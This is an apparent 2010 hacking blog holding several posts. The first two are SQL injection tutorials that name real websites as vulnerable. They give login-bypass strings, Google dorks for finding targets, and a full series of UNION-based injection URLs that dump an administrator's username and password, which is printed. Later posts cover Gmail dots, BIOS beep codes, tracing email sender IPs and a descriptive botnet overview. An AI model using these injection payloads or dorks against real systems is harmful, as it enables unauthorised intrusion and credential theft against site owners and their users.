Saturday, 16 January 2010

SQL Injection

SQL Injection

When constructing websites where there is the facility for registering and the need for identifying users individually, then we need to have some setup to save user-names and passwords. Files do serve a good place to do it, but some times it is more of a bane than boon. That’s where databases replace the old age files. Databases have the specialty of saving data in the form of tables which are easy to search, modify, add and delete.
SQL is short for Structured Query Language, a powerful tool that help you deal with data saved in databases. You can find the login form in many websites these days. You will be authenticated to access extra facilities if you are in possession of the correct pair of user-name and password. Well, user-name is unique, which most of you will be aware of. Now a days most of the authentication process is done via SQL. So it becomes necessary to know some details of SQL queries.
select * from table; is a very common SQL query. The asterisk represents everything. During user authentication, a probable SQL query might be
$query – An SQL query.
$username – a variable having the user name provided by the user in the user name text box.
$password – a variable having the password provided by the user in the password text box.

$query = select password from logtable where username = ‘.$username.’;
$spass = mysql_query($query);
if ($password == $spass){
echo “User Authenticated”;
}

This is a simple “example”. Mind you it might not be following syntax rules or anything. What i have tried here is to explain is how a basic user authentication could be performed.
Note: There are many other methods, but this is a basic one and the one prone to SQL injection.
Now consider this query.
select password from logtable where username = ” or ‘a’ = ‘a’;
See that the where part of this statement returns true, because of ‘a’ = ‘a’. Due to this the query returns a true value that is similar to being authenticated. So instead of a user-name and password into the respective fields, if you enter this (‘ or ‘a’='a) without the brackets, then if the SQL query is an insecure one then you can be authenticated into the first entry! This is because the string ‘ or ‘a’='a comes in place of $username in the below query.
$query = select password from logtable where username = ‘.$username.’;
Try it out at www.fiitjee.com.
It’s prone to SQL injection for now. Hope they correct the code as soon as possible. The earlier the better for them!

SQL Injection : Ultimate method for Website Hacking.

SQL Injection : Ultimate method for Website Hacking.

I just found a good security expert  (Nishant Soni) in ORKUT, He is going to teach you about SQL Injection, Sniffing, Trojans and many more topics. Hope you enjoy them.
Welcome to my very first tutorial for  SQL Injection on Genius hackers. SQL Injection basically means to execute a query in the database which is connected to the website to get personal information out of it, which is not visible to a normal user. Database is most likely to be a part of the websites, which saves all the information like user names, passwords, posts, replies in it. So there is a possibility that you might put some commands or queries or requests whatever you want to call it into the database to get some hidden information out of it.
It is noticed that in the past SQL Injection have been used several times to steal the credit card information, E-mail address and passwords, because most of the users have same E-mail address and passwords into all of their E-mail accounts. So if you manage to hack one of the accounts, you may just get access to all of their accounts. SQL Injection is most likely used by the “Penetration Testers” to check if the website of their clients are vulnerable to some kind of attacks to steal the information. Here, in this article I will show you how do they do it. There are some simple terms expected out of you and one of them is that you understand the basic knowledge of the computer. This tutorial will let you know, how to start? where to stop? what to do? and if you have any further queries you can post them here and i will help you to work with it.
PLEASE REMEMBER: Nishant Soni or Genius Hackers take no responsibility of whatsoever damaged is made by you by this knowledge. This is just for the educational purposes so you can secure your own website.
I will divide this tutorial into some points so it can help you in a better way to understand the structure of the SQL Database which is working at the backend of the website to store, save and execute the information.
I will use a LIVE website in this tutorial, so you can try to test it on your own and believe me it really helps to develop your skills.
The website that I will use today is www[dot]rfidupdate[dot]com.
To understand what is an SQL Database, the very simple thing i can explain to you is the “website where you can register, login or create your own profile. Because it will save the data you input into your profile and will execute / display them whenever you provide the correct username or the password. So in the same way the website i mentioned above will give you a chance to be a part of it, it will update you daily about respective news.
1. How to check if the website is vulnerable to SQL Injection?
A:
On most of the website i read people saying that try to add “`” at the end [without quotes], and if you get some error that means that the website is vulnerable to SQL Injection. But being an experienced guy in the penetration, i’d rather tell you that this is a TOTAL MYTH. The best way to check the site vulnerability is to add “+order+by+6753″ at the end of the URL. Because, 97% of the websites don’t have more then 6753. columns. So by adding 6753 number, you will check if it has 6753 columns, which it apperatenly doesn’t have. So it will give you an error, and if it does that means that the WEBSITE IS VULNERABLE. It is generally noticed that a website doesn’t have more than 100 columns at the most in its database. So by entering the number 6753, you are trying to make it sure if the website gives you an error with it. IF it does that means you can proceed further. To check an SQL Injection, its mandatory that the website should be pointing it self to some specific page, i.e. “website.com/index.php?page=11″. So in this case the website is pointing it self to page Number.11 to pull up some specific information. So, to check if the website is vulnerable or not, you can try with the following URL. i.e. “website.com/index.php?page=11+order+by+6753″.

2. How would i find the vulnerable websites?
A.: Google is the best friend of Hackers
, when I say this don’t assume that i am just writing it because i am supposed it. I really mean it. There is something called as “google dorks”, which are basically a command which could be put into the Google search to find out specific groups of pages.
here are some Google dorks which you may try to find out the vulnerable websites.
a. inurl:index.php?page=
b. inurl:members.php?member=
c. inurl:index.php?id=
d. inurl:articles.php?page=

This will help you to find out the websites which are connected and working with SQL Databases at the backend. Some of them might be vulnerable to SQL Injection. So you can try to put “order+by+6753″ at the end of the URL to check if its vulnerable.
Step 1 : Finding Vulnerable Page.
Lets start, as you’ll know the website that i will test today is www.RfidUpdate.com. So lets open up the website in the browser. So just a little information about website, RFID means “radio frequency identification”. So on the right hand side you will see that it gives you an opportunity to subscribe to the website. So now it should give you an idea that when you subscribe to it, there has to be a place where your E-mail address should be saved, so it has to have a database! So, now we know that the website is supported by an SQL Database at the backend. So we are on the right track.
As I have written earlier, in order to perform an SQL Injection we will have to find a page that has “something.php?id=2121″ at the end of the URL, so we will try to find such page on RfidUpdate.com. I have found a page by exploring the website a bit. The URL of the page is,
http://www.rfidupdate.com/articles/index.php?id=1563
Image 1: SQL Injection (Click to enlarge )
Image 1: SQL Injection (Click to enlarge )
So now, we know it has an SQL Database and we have the apge where we can start with.
So lets try to check if the website is vulnerable to SQL Attack, we will try to add “+order+by+6753–” as i have written earlier.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+6753–
Now, you should have noticed an error, which says :
“Error 1054: Unknown column ‘6753′ in ‘order clause’”

So, It means that the database gave u a message saying “there is no such column”. So error doesn’t really make any difference, but the main thing we should notice is that the database communicated with us directly. So there is a possibility that we can exploit it.
Step 2 : Finding Number of Columns.
Now, the next thing we will try is to find the out many columns do this page have. So now, instead of “6753″, we will start from number 1 then 5 then 15, we will keep doing this unless we get some error. So, try the following url.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+1–
The webpage opened up fine, which means that the website has more then 1 column, now try number 5.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+5–
Same thing, now try 10.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+10–
Still no error, try 15.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+15–
Still no error :( , try 20.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+20--
WHOA!, We got the error, which means that the number of columns in the webpage is between 15 to 20. So lets try with number “16″ now.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+16–
YAY!, you got the error on number “16″ as well. Which means, that the website has 15 columns. So now lets move further.
Step 3 : Using “Union Select All” Command.
Now, we will try to combine all the columns and we will see what do we get, the command goes as follow:-
http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15–
Image 2: SQL Injection (Click to enlarge )
Image 2: SQL Injection (Click to enlarge )
FYI:- please notice tha ti have added “-” before 1563.
Now you see some broken things in there, and now you see that the only indipendent number of column you see on the website is “7″. So apperantly that would be the base of the attack. Everything we do now, would be done with the column number “7″.
So we wil ltry to find the some more information about the DATABASE this website is using, so to do this we can replace the column number 7 with “@@version“, without quotes ofcourse. So try this now.
http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15–
Image 3: SQL Injection (Click to enlarge )
Image 3: SQL Injection (Click to enlarge )
This is what you should see now,
5.0.67-community

Which means, that the website is using SQL Version > 5.  Now, try following URL to move further.
http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15+from%20information_schema.tables%20where%20table_Schema=database%20()–
Image 1: SQL Injection (Click to enlarge)
Image 4: SQL Injection (Click to enlarge)
Here, we have replaced No.7 column with “group_concat(table_name)” and we have added “from information_schema.tables where table_Schema=database ()” at the end. Which  are basically the standard commands for SQL, to get the further information from the specific column.
YAY! You should have already noticed that the name of the further columns have appeared in the list and one of them is “ru_Admin”. Thats what we are looking for. Since we have the column for admin now, we will try to find out the username and password out of it. So let try following URL into the address bar.
http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15+from%20information_schema.columns%20where%20table_Schema=database%20()–
The only thing we’ve changed here is the “tables” to “columns”, and you should see all the information about the admin’s tables now which should look something like following.
“ru_Admin_Username,ru_Admin_Password”
So we see, we might be able to crack the username as well as the password. In order to see the information inside the username and the password column lets put following URL:
http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,group_concat(ru_Admin_username,0×3a,ru_Admin_password),8,9,10,11,12,13,14,15+from%20ru_Admin–
What we did is, to replace the columns names with admin_username & admin_password, and call it from ru_Admin column at the end.
Image 5: SQL Injection (Click to enlarge )
Image 5: SQL Injection (Click to enlarge )


VOILA! What you’re looking at right now the “admin” username and the password in following format.
username : password.
admin:admRIvuxHahkQ
FYI: Wherever you see “%20″ in the URL, that means a SPACE in the address bar.

So you have the password now, you can use it the way you want!.
So this the way to perform an SQL Injection attack. You may try your own stuffs with the google dorks i posted in the beginning. Use it the way you want, just keep in mind that if u know 80/100, there are people out there who know 90/100. So better secure your self first, and try these attacks with the permission of the site owners.
Thank you all for reading this tutorial, I am sure it helped. If there are any more questions feel free to revert back to the same post.
Enjoy Ethical hacking

Monday, 11 January 2010

GMAIL Does Not Recognise Dots(..)

GMAIL Does Not Recognise Dots(..)

Hi friends...
Its quite surprising and interesting.we have been using gmail since years.But you may not notice this feature.It doesn't "recognize dots in username."
At gmail log in page you can enter any number of dots in username.gmail ignores it as such.
For example if your usenrname is xyz@gmail.com then,if you enter
x.y.z@gmail.com
x.....y.z@gmail.com
xyz...@gmail.com
or any number of dots , with same password it log ins succesfully.Try it Once:)

Sunday, 10 January 2010

Understand The Beep

Understand The Beep

One Beep :
DRAM refresh failure
This may be due to - Bad memory chips
- A bad DMA Chip
- Bad memory addressing chips on the motherboard

Two Beeps :
Parity error or Parity Circuit failure
-Your memory may not be seated properly on the mother board.
-Unplug and plug it properly

Three Beeps :
Bad memory or bad mother board

Four beeps :
Timer failure in the RAM.

Five Beeps :
CPU chip may be dead

Six Beeps :
Keyboard controller may have failed

Seven beeps :
CPU is dead. Retry the connections and test.
-Replace the whole motherboard.

Eight Beeps :
Video card is missing or Bad.

Nine Beeps :
Damaged ROM BIOS.
-BIOS chip has to be replaced if it persists.

Ten Beeps :
CMOS shutdown.
-Replace CMOS memory and associated chips.

Eleven Beeps :
Cache memory test has failed.
-To enable cache memory try CTRL+ALT+SHIFT++.

One long Beep and Three short Beeps:
Memory failure

One long Beep and Eight short Beeps :
Video card failure.
-Try to install video card in another slot.

No Beeps :
Check Power supply
-Check mother board connections
-Remove all cards except video card and check for system power up
-Insert all cards one at a time and check their operation.
-If system hangs on the installation of a particular card, then it is the cause for the problem and replace it with another of that type and check







How to find the IP address of the email sender in Yahoo! Mail

Guide to tracking of emails to find sender's IP address using email headers.

In this tutorial i shall be writing about the trick to get the IP Address of sender in Yahoo Mail. This is useful if someone is spamming your inbox with junk mail or any other reason you may have to find the location of the email sender.

After you find out the IP address of the sender you just have to use a location lookup service to find the exact location (country, city, etc) of the sender. .

Note: You won't be able to find the real IP address if the sender uses an anonymous proxy server.

Here is a step by step guide to get the IP address of an email sender in Yahoo! Mail:

1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or any folder where you have stored your mail.
3. Open the mail
4. At the bottom right region of the email, you'll see there is a drop-down option "Full Headers". If you can't find it press Ctrl+F and search for "header".


5. Click on it and look for Received: from followed by the IP address between square brackets [ ].


6. That should most likely be the IP address of the sender. If there are many instances of Received: from with the IP address, select the IP address in the last pattern. If there are no instances of Received: from with the IP address, select the first IP address in X-Originating-IP.

Now, you can find the exact location of the sender by using GeoBytes IP Locator or IP2Locatio

Saturday, 9 January 2010

BOTNET REVEALED

  • What is a botnet?
  • How are botnets used?
  • Bot commands
  • Types of botnet
    • Classification of botnets according to architecture
    • Classification of botnets according to network protocols
  • Botnet evolution
  • P2P botnets
  • The botnet business
  • Conclusion
This article discusses zombie networks or botnets: how they are created, who uses them to make money on them and how this is done. Readers who are already familiar with the subject will find the information on the latest trends in botnet development of interest.
The article is the first in a series of publications on the botnet problem.
Botnets have been in existence for about 10 years; experts have been warning the public about the threat posed by botnets for more or less the same period. Nevertheless, the scale of the problem caused by botnets is still underrated and many users have little understanding of the real threat posed by zombie networks (that is, until their ISP disconnects them from the Internet, or money is stolen from their credit cards, or their email or IM account is hijacked).

What is a botnet?

First of all, we need to understand what a botnet or zombie network is.
A botnet is a network of computers made up of machines infected with a malicious backdoor program. The backdoor enables cybercriminals to remotely control the infected computers (which may mean controlling an individual machine, some of the computers making up the network or the entire network).
Malicious backdoor programs that are specifically designed for use in creating botnets are called bots.
Botnets have vast computing power. They are used as a powerful cyber weapon and are an effective tool for making money illegally. The owner of a botnet can control the computers which form the network from anywhere in the world – from another city, country or even another continent. Importantly, the Internet is structured in such a way that a botnet can be controlled anonymously.
Computers infected with a bot can be controlled either directly or indirectly. When bots are controlled directly, the cybercriminal establishes a connection with an infected computer and manages it by using commands built into the bot program. In the case of indirect control, the bot connects to the control center or other machines on the network, sends a request and then performs the command which is returned.
The owner of an infected machine usually does not even suspect that the computer is being used by cybercriminals. This is why computers infected with bot malware and which are surreptitiously controlled by cybercriminals are also called zombies. The networks formed from infected machines can be called zombie networks. Most zombie machines are home users' PCs.

How are botnets used?

Botnets can be used by cybercriminals to conduct a wide range of criminal activity, from sending spam to attacking government networks.
Sending spam. This is the most common use for botnets, and is also one of the simplest. Experts estimate that over 80% of spam is sent from zombie computers. It should be noted that spam is not always sent by botnet owners: botnets are often rented by spammers.
It's the spammers who understand the real value of botnets. According to our data, an average spammer makes $50,000 – $100,000 a year. Botnets made up of thousands of computers allow spammers to send millions of messages from infected machines within a very short space of time. In addition to speed and the sheer volume of spam that can be sent, botnets provide spammers with one more advantage. Addresses used to send spam are often blacklisted, and messages coming from these addresses will be blocked or automatically flagged as spam by mail servers. Using hundreds of thousands of email addresses ('borrowed' from the owners of zombie computers) helps spammers overcome this problem.
Another botnet 'bonus' for spammers is the opportunity to harvest email addresses from infected computers. Stolen addresses are sold to spammers or used by the botnet owners themselves to send spam. A growing botnet will add more and more new addresses to the harvest.
Blackmail. The second most popular method of making money via botnets is to use tens or even hundreds of thousands of computers to conduct DDoS (Distributed Denial of Service) attacks. This involves sending a stream of false requests from bot-infected machines to the web server under attack. As a result, the server will be overloaded and consequently unavailable. As a rule, cybercriminals demand payment from the server's owner in return for stopping the attack.
Today, many companies work exclusively on the Internet. Downed servers bring business to a halt, resulting in financial losses. To return stability to servers as soon as possible, such companies are more likely to give in to blackmail than ask the police for help. This is exactly what cybercriminals are counting on, and DDoS attacks are becoming increasingly common.
DDoS attacks can also be used as a political tool. In such cases, attacks usually target servers belonging to government organizations. What makes such attacks particularly dangerous is that they can be used as provocation, with a cyber attack on one country being conducted from servers in another country and controlled from a third country.
Anonymous Internet access. Cybercriminals can access web servers using zombie machines and commit cybercrimes such as hacking websites or transferring stolen money. This activity, of course, appears to come from the infected machines.
Selling and leasing botnets. One option for making money illegally using botnets is based on leasing them or selling entire networks. Creating botnets for sale is also a lucrative criminal business.
Phishing. Addresses of phishing pages are often blacklisted soon after they appear. A botnet allows phishers to change the addresses of phishing pages frequently, using infected computers as proxy servers. This helps conceal the real address of the phishers' web server.
Theft of confidential data. This type of criminal activity will probably never lose its attraction for cybercriminals. Botnets help increase the haul of passwords (passwords to email and ICQ accounts, FTP resources, web services etc.) and other confidential user data by a factor of a thousand. A bot used to create a zombie network can download another malicious program, e.g., a password stealing (PSW) Trojan, and infect all the computers on the botnet with it, providing cybercriminals with passwords from all the infected computers. Stolen passwords are sold or used for mass infections of web pages (in the case of FTP account passwords) in order to further spread the bot program and expand the zombie network.

Bot commands

Bots can carry out a wide range of commands, but the most common ones are listed below. Command names can vary from one bot implementation to another, but the functions performed remain the same.
Update: download and launch a designated executable file or module from a specific server. This is a basic command and is the first to be executed. It is used to update a bot's executable file at the command of the zombie network owner if the owner wants to install a new version of the bot program. It can also be used to infect the computer with other malicious programs (such as viruses or worms) and install other bots on the computer. Using this command, PSW Trojans can be installed on all computers that make up the botnet at the same time in order to find all the passwords ever entered on each computer and stored in its memory. The passwords will be sent to a server on the Internet.
Flood: start creating a stream of false requests to a specific Internet server in order to make it fail or to overload channels in a specific segment of the Internet. Such streams can cause servers to malfunction, making them inaccessible to ordinary users. Such attacks using botnets are called DDoS (distributed denial of service). Although there are numerous methods that can be used to create false network requests, describing them in detail is beyond the scope of this article.
Spam: download a spam message template and begin sending spam to designated addresses (each bot is assigned a set of addresses).
Proxy: use the computer as a proxy server. This function is often included in a bot's core functionality rather than being implemented as a separate command. This feature makes it possible to use any computer which is part of a botnet as a proxy server in order to conceal the real address of the cybercriminal controlling the botnet.
Other commands, which are not as popular as those described above, are only implemented in some bots. These additional commands include making screenshots, logging keystrokes, requesting the user's network activity log file (used for stealing accounts and confidential data), sending this file from the user's computer, identifying serial numbers for the software installed on the user's computer, obtaining detailed information about the user's system and network environment, requesting a list of computers included in the botnet, etc.

Types of botnet

Today's botnet classification is relatively simple, and uses botnet architecture the protocols used to control bots as a basis.

Classification of botnets according to architecture

There are currently only two known types of botnet architecture.
  1. Centralized botnets. In this type of botnet, all computers are connected to a single command-and-control center or C&C. The C&C waits for new bots to connect, registers them in its database, tracks their status and sends them commands selected by the botnet owner from a list of bot commands. All zombie computers in the botnet are visible to the C&C. The zombie network owner needs access to the command and control center to be able to manage a centralized botnet.


    Figure 1. Centralized topology (C&C)
    . Centralized botnets are the most widespread type of zombie network. Such botnets are easier to create, easier to manage and they respond to commands faster. However, it is also easier to combat centralized botnets, since the entire zombie network is neutralized if the C&C is put out of commission.
  2. Decentralized or P2P (peer-to-peer) botnets. In a decentralized botnet, bots connect to several infected machines on a bot network rather than to a command and control center. Commands are transferred from bot to bot: each bot has a list of several 'neighbors', and any command received by a bot from one of its neighbors will be sent on to the others, further distributing it across the zombie network. In this case, a cybercriminal needs to have access to at least one computer on the zombie network to be able to control the entire botnet.


    Figure 2. Decentralized topology (P2P)
    In practice, building decentralized botnets is not an easy task, since each newly infected computer needs to be provided with a list of bots to which it will connect on the zombie network. It is much easier to direct a bot to a central server first, where it will receive a list of 'neighbor' bots, and only then switch it to P2P connections. This mixed topology is also categorized as P2P, although at a certain stage the bots will use a C&C. Combating decentralized botnets is a much more difficult task than that of combating centralized networks as an active P2P botnet has no control center.

Classification of botnets according to network protocols

For a botnet owner to be able to send commands to a bot, it is essential that a network connection be established between the zombie machine and the computer transmitting commands to it. All network connections are based on protocols that define rules for the interaction between computers on the network. Therefore, botnets can be classified based on the network protocols used.
Botnets can be divided into the following classes when classified according to network protocols:
  1. IRC-oriented. This is one of the very first types of botnet: bots were controlled via IRC (Internet Relay Chat) channels. Each infected computer connected to the IRC server indicated in the body of the bot program, and waited for commands from its master on a certain channel.
  2. IM-oriented. This type of botnet is not particularly common. It differs from IRC-oriented botnets only in that it uses communication channels provided by IM (instant messaging) services such as AOL, MSN, ICQ etc. The reason for the relatively low popularity of such botnets lies in the difficulty of creating individual IM accounts for each bot. Bots should be connected to the network and remain online all the time. Since most IM services do not permit logging on to the system from more than one computer at a time while using the same account, each bot needs its own IM account. However, IM services try hard to prevent any kind of automatic account registration. As a result, owners of IM-oriented botnets only have a limited number of registered IM accounts at their disposal, which limits the number of bots that can be online at any one time. Of course, they can arrange for different bots to share the same account, come online at predefined times, send data to the owner's number and wait for a reply for a limited period of time, but this is inefficient: it takes such networks too long to respond to their masters' commands.
  3. Web-oriented. This is a relatively new and rapidly evolving type of botnet designed to controlling zombie networks over the World Wide Web. A bot connects to a predefined web server, receives commands from it and transfers data to it in response. Such zombie networks are popular because they are relatively easy to create, there is no shortage of web servers on the Internet and a web interface can be used for easy management.
  4. Other. In addition to the botnet types listed above, there are other types of botnets that communicate via their own protocol that is only based on the TCP/IP stack, i.e., they only use transport-layer protocols such as TCP, ICMP and UDP.

Botnet evolution

The history of botnets began in 1998 - 1999, when the first backdoor programs – the notorious NetBus and BackOrifice2000 – appeared. These were proof-of-concept Trojans, i.e. programs that implemented completely new technologies. NetBus and BackOrifice2000 were the first to include a complete set of functions that made it possible to remotely administer infected computers, enabling cybercriminals to perform file operations on remote machines, launch new programs, make screenshots, open or close CD-ROM drives, etc.
The backdoors, which are Trojan programs by nature, were designed to work without the user's knowledge or consent. To control an infected computer, a cybercriminal had to establish a connection with each infected machine individually. The first backdoors worked on local area networks based on the TCP/IP protocol stack and demonstrated, in essence, the possibilities to exploit the Windows API in order to control a remote machine.
Even in the early 2000s, remote administration client programs were already able to control several machines at the same time. However, unlike today's backdoors, NetBus and BackOrifice2000 operated as network servers: they opened a predefined port and passively waited for the master to connect (the contemporary backdoors which are used to create botnets establish a connection on their own).
A malicious user then came up with the idea that computers infected with backdoors should establish connections themselves and that they should always be visible online (on the condition that the machine is switched on and working). This user must almost certainly have been a hacker, because new-generation bots employed a communication channel traditionally used by hackers – IRC (Internet Relay Chat). It is also likely that the development of new bots was made easier by the fact that bots working in the IRC system were open source (even though these bots were not designed for remote administration purposes but to respond to user requests such as questions about the weather or when another user had last appeared in chat).
When infecting a computer, the new bots connected to IRC servers on a predefined IRC channel as visitors and waited for messages from the botnet owner. The owner could come online at any time, view the list of bots, send commands to all infected computers at once or send a private message to one infected machine. This was the original mechanism for implementing a centralized botnet, which was later christened C&C (Command & Control Center).
Developing such bots was not difficult because the IRC protocol has simple syntax. A specialized client program is not required to use an IRC server – a universal network client, such as Netcat or Telnet, can be used.
Information about the new IRC botnets spread rapidly. As soon as articles about them began to come out in hacker magazines, a new breed of malicious users appeared: botnet 'hijackers'. These people probably knew as much as botnet owners, but they were after easier money. They looked for IRC channels that had suspiciously large numbers of visitors, entered these channels, studied the botnet and 'hijacked' it. This was done by seizing control of the network, redirecting bots to other, password-protected, IRC channels and the result was full control over somebody else's network of infected machines.
The next stage in the evolution of botnets was marked by moving control centers onto the World Wide Web. First, hackers developed tools for remotely controlling servers based on such popular script engines as Perl and PHP or, more rarely, ASP, JSP and a few others. Then somebody developed a method by which a computer on a local area network could connect to a server on the Internet; this made it possible to control the computer from anywhere in the world. Descriptions of the method for remotely controlling computers on local area networks which bypassed such protection as proxy servers and NAT were published online and it soon became popular in certain circles. Remote administration was based on establishing an HTTP connection with the administration server using the client computer's local settings. If the user configured an address, port, login and password for a proxy server, an authorization mechanism was automatically activated in a dynamic-link library providing HTTP support (Wininet.dll). From a programmer's viewpoint, this was a simple and accessible solution.
The development of semi-legitimate remote administration tools that could be used to evade protection on machines in local area networks and to gain remote access to such computers paved the way for web-oriented botnets. A little later, a simple script was developed for controlling small computer networks and cybercriminals found a way of using such controlled networks for making money.
Web-oriented botnets proved a very convenient solution, which remains popular to this day. A large number of computers can be managed using any device that has Internet access, including a mobile phone that supports WAP/GPRS. And even a child can learn to use a web interface. The further development of the Internet and improved web development technologies were also conducive to the use of web-oriented botnets.
There were also attempts to create botnets controlled via IM services. However, IM botnets never became very widespread, particularly because they require creating IM accounts. It is difficult to register a large number of accounts automatically as systems which protect against automated registrations are constantly modified.
This was not the end of botnet evolution: after trying all available protocols, botnet developers turned their attention to network architecture. It turned out that botnets with classic architecture (i.e. a large number of bots with one command and control center) are very vulnerable, since they depend on a critical node – the command and control center. If this is disabled, control over the entire network will be lost. Models based on simultaneously infecting computers with different bots connecting to different command and control centers sometimes work, but such botnets are much harder to maintain, since two or three C&Cs need to be controlled at the same time.
Experts believe that P2P botnets, which do not have a C&C, could become both highly effective and pose a serious threat. All that the zombie network's owner needs to do is send a command to one of the computers on the network, and the bots will spread the command to other computers in the botnet automatically. In principle, each computer on a botnet can connect to any other computer in the same zombie network. Experiments related to creating such networks have been conducted for quite some time, but the first large botnet using P2P architecture did not appear until 2007. It is P2P botnets that have attracted the most attention, and are the IT security industry's greatest cause for concern.

P2P botnets

The Storm Botnet

In 2007, the attention of security researchers was attracted by a P2P botnet created using a malicious program known as the Storm Worm. Authors of the Storm Worm were spreading their creation so rapidly that it seems as though they had set up a conveyor belt to create new versions of the malicious program. From January 2007 onwards, we have detected between three and five new Storm Worm (Kaspersky Lab classifies it as Email-Worm.Win32.Zhelatin) variants a day.
Some experts believe that the Storm Worm is a malicious program designed to build new-generation zombie networks. Clearly, the bot is being developed and distributed by professionals, and both the zombie network architecture and its defense are well-designed. The following facts bear this out:
  • The bot code mutates, making it similar to polymorphic viruses. However, the Strom Worm is different in that the code that conducts the mutation operates on a dedicated computer on the Internet rather than within the program itself (as is the case with polymorphic viruses). This mechanism is called server-side polymorphism.
  • Mutation takes place at a relatively high rate (hourly mutation has been recorded) and, importantly, the mutation takes place on the server side, making antivirus database updates ineffective for many users.
  • The Storm botnet is protected against the curiosity of security analysts. Many antivirus companies regularly download new copies of the worm from the servers used to spread the malicious program. When frequent requests from the same address are detected, bots receive the command to launch a DDoS attack on that address.
  • The bot malware attempts to remain as inconspicuous as possible on infected machines. Obviously, malicious programs that are constantly launching attacks are more easily detected by users and system administrators. Therefore, controlled activity that does not use a large amount of system resources is the safest from a malicious program's point of view.
  • Instead of communicating with a central server, the Storm Worm only connects to a small number of 'neighbor' computers on the infected network. This makes identifying all zombie machines on a P2P network practically impossible. The same principle can be used for setting up resistance groups: every member of a group knows only a few other members and the failure of one agent does not mean the failure of the entire group.
  • The authors of the worm are constantly changing the methods used to spread it. Originally, the malicious program was distributed as an attachment to spam messages (specifically, in an attachment that looked like PDF files). Later, attachments were replaced with links to infected files inserted into spam messages. There were also attempts to automatically post comments containing links to infected web pages to blogs. Whatever the method used to spread the malicious program, its authors employed sophisticated social engineering techniques.
The Storm botnet has caused numerous problems. Apart from mass-mailing of spam, it is suspected that the botnet was used in a number of large-scale DDoS attacks across the globe. According to some researchers, the Storm botnet was implicated in the cyber attack on Estonia in 2007. The damage such a network could potentially cause makes ISPs and Internet hosting providers uneasy. Adding to the uncertainty is that fact that the size of the Storm botnet remains unknown. While other zombie networks that are fully or partially dependent on a C&C can be seen in their entirety (because the C&C sees each zombie computer connected to the botnet), no expert has seen a list of infected machines which make up the Storm Botnet. Estimates vary, putting the size of the botnet at between 50,000 to 10,000,000 zombie computers.
By the end of 2007, the Storm botnet seemed to have melted away, although we still detect several new versions of the bot every day. Some experts believe that the zombie network was broken up into parts and sold, while others think that the botnet proved unprofitable; the considerable costs of development and support could not be covered by the income it generated.

Mayday

Mayday is another interesting botnet and it technically differs slightly from its forerunners. The bot (Kaspersky Lab classifies it as Backdoor.Win32.Mayday) and the zombie network it creates bear this name as it the word was part of a domain name used by one variant of the malicious program.
Mayday is a botnet based on P2P architecture. After launching, a bot connects to the web server specified in the program's body, registers itself in the server database and receives a list of all bots on the infected computer network (in the case of the Storm Worm, each bot received only a partial list). Then the bot establishes peer-to-peer connections with other bots in the zombie network.
We found six different servers around the world (in the UK, the US, the Netherlands and Germany) which bots connected to when creating the botnet. By early March 2008, only one server was still operational, with about 3,000 bots registered on it (compare this to the Storm botnet, which at the most conservative estimates included tens of thousands of infected computers). Network size is not the only criterion in which Mayday is inferior to its 'big brother' Storm: the Mayday botnet uses a non-encrypted network communication protocol, the malicious code has not been tweaked to hinder analysis by antivirus software and, most importantly, new bot variants are not released with anything nearing the frequency we saw with new variants of the Storm Worm. Backdoor.Win32.Mayday was first detected by Kaspersky Lab in late November 2007, and since then just over 20 different variants of the malicious program have made it into our collection.
As regards new technologies, it is worth noting two non-standard approaches implemented in the botnet.
First of all, the Mayday network uses peer-to-peer (P2P) communication based on ICMP messages with a 32-byte payload.
Most users are familiar with ICMP (Internet Control Message Protocol) because it is used by the PING utility to check whether a network host is accessible. However, the protocol offers a much more extensive range of functions than this. Wikipedia gives the following definition of ICMP: “The Internet Control Message Protocol (ICMP) is one of the core protocols of the Internet protocol suite. It is chiefly used by networked computers' operating systems to send error messages—indicating, for instance, that a requested service is not available or that a host or router could not be reached.”
Figure 3 shows a screenshot of a packet sniffer program that has registered the transmission of ICMP packets from a Mayday bot. None of the bots previously known to us used ICMP to transmit data.


Figure 3. ICMP packets sent by a Mayday bot
ICMP is used to check bot accessibility on an infected computer network and for bot identification. Since Mayday bots are designed to work under Windows XP SP2, once launched they modify the Windows firewall rules in order to receive ICMP packets.
The second and perhaps most important thing that is different about a Mayday botnet is its command and control center.
Command and control centers of web-oriented botnets use a mechanism known as CGI (Common Gateway Interface). By design, web server technology allows for the use of executable files as an implementation of CGI. Later, a variety of script engines appeared as well. A CGI application generates the content of a web page requested by a user in real time, ensuring execution of the program and displaying the results of its operation instead of static data from the web server. A CGI script works in a similar way, but it needs an interpreter (script engine) to output the results of its operation. As a rule, command and control centers for web-oriented botnets are based on script engines.
In cooperation with law-enforcement agencies, we managed to obtain a copy of the program used in a Mayday C&C. The server-side software of Mayday is a 1.2 megabyte standalone ELF file (the Linux executable file equivalent to Windows EXE files) without any modules. It does not require the system to have a script engine. At first glance, there is nothing strange about the fact that authors of Mayday developed a CGI application instead of a CGI script. However, it does raise a number of questions.
It is far more difficult to develop a CGI application than it is to write a CGI script, because it requires special effort to make the code stable and reliable. Currently, 99% of web development uses script engines, while monolithic CGI executables are developed only when it is absolutely necessary to optimize everything down to the smallest detail. As a rule, this approach is taken by large corporations when developing projects that have to be able to function under huge loads. For example, monolithic CGI programs are used in such web systems as eBay, Paypal, Yahoo! etc.
